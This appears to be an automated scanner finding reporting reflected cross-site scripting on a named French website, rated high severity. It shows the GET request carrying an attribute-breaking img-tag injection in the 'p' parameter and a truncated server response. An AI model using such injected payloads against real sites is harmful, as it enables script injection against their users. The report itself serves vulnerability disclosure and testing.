1. Cross-site scripting (reflected)
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.randco.fr |
| Path: | / |
| GET /?p=actualites82f2d"><img%20src%3da Host: www.randco.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=112901127 |
| HTTP/1.1 200 OK Date: Sun, 28 Nov 2010 02:13:52 GMT Server: Apache Content-Length: 5045 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title></t ...[SNIP]... <img src="img/ssmenu ...[SNIP]... |